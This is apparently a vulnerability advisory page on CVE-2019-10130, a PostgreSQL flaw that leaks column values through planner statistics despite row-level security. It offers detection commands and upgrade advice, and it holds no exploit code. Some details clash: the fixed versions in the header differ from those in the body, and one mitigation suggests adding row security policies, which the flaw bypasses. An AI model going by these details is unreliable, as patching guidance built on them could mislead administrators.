Plataforma
postgresql
Componente
postgresql
Corrigido em
11.0.1
10.0.1
9.6.1
9.5.1
CVE-2019-10130 is an information disclosure vulnerability affecting PostgreSQL versions 11.x (prior to 11.3), 10.x (prior to 10.8), and 9.x (prior to 9.6.13 and 9.5.17). This flaw allows attackers to potentially read sensitive data stored within column statistics used during query planning. The vulnerability stems from PostgreSQL's failure to evaluate row security policies before accessing these statistics. A fix is available in PostgreSQL 11.3 and later.
This vulnerability allows an attacker with SELECT privileges on a table to potentially extract sensitive data from column statistics. PostgreSQL maintains statistics about columns, including histograms and lists of common values, which are used to optimize query execution. The flaw lies in the fact that PostgreSQL doesn't enforce row-level security policies when accessing these statistics during query planning. Consequently, an attacker can craft queries that indirectly reveal the most frequent values within specific columns, even if they shouldn't have direct access to the underlying data. The potential impact ranges from exposure of personally identifiable information (PII) to sensitive business data, depending on the nature of the data stored in the affected columns. While the CVSS score is LOW, the potential for data leakage makes this a significant concern, particularly in environments with strict data privacy regulations.
CVE-2019-10130 was publicly disclosed on July 30, 2019. There is no indication of this vulnerability being actively exploited in the wild. Public proof-of-concept (PoC) code is available, demonstrating the feasibility of exploitation. It is not listed on the CISA KEV catalog. The vulnerability's low CVSS score suggests a relatively low probability of exploitation, but the availability of PoC code warrants attention and remediation.
Organizations running PostgreSQL versions 9.5, 9.6, and 10, particularly those handling sensitive data or operating in regulated industries, are at risk. Environments with complex row-level security policies that are not properly enforced are also more vulnerable. Shared hosting environments where multiple users have access to the same PostgreSQL instance should be carefully assessed.
• postgresql: Use psql to check the PostgreSQL version:
psql -U postgres -c "SELECT version();"• postgresql: Examine PostgreSQL logs for unusual query patterns or errors related to statistics collection. Look for queries accessing statistics tables directly.
• linux / server: Use journalctl to filter for PostgreSQL-related errors or warnings.
journalctl -u postgresql --since "1 week ago" | grep -i errordisclosure
patch
Status do Exploit
EPSS
0.20% (percentil 42%)
Vetor CVSS
The primary mitigation for CVE-2019-10130 is to upgrade to PostgreSQL version 11.3 or later, which includes the fix. If an immediate upgrade is not feasible, consider implementing row-level security policies to restrict access to sensitive columns. While not a direct fix, this can limit the attacker's ability to exploit the vulnerability. Additionally, review and restrict SELECT privileges on tables to minimize the potential attack surface. Monitor PostgreSQL logs for unusual query patterns that might indicate exploitation attempts. After upgrading, confirm the fix by running a query that previously triggered the information disclosure and verifying that it no longer reveals sensitive data.
Actualice PostgreSQL a la última versión disponible. Las versiones 9.5.17, 9.6.13, 10.8 y 11.3 corrigen esta vulnerabilidad. La actualización solucionará el problema de seguridad.
Análise de vulnerabilidades e alertas críticos diretamente no seu e-mail.
CVE-2019-10130 is a vulnerability in PostgreSQL that allows attackers to read sensitive column values via query planning statistics. It affects versions ≤11.x (excluding 11.3), 10.x (excluding 10.8), and 9.x (excluding 9.6.13 and 9.5.17).
You are affected if you are running PostgreSQL versions 9.5, 9.6, 10, or 11 prior to the respective fixed versions (9.5.17, 9.6.13, 10.8, and 11.3).
Upgrade to PostgreSQL version 11.3 or later to resolve this vulnerability. If an immediate upgrade is not possible, implement row-level security policies.
There is no current evidence of active exploitation in the wild, although public proof-of-concept code exists.
Refer to the PostgreSQL security advisory at https://www.postgresql.org/announcements/security.php
Envie seu arquivo de dependências e descubra na hora se esta e outras CVEs te atingem.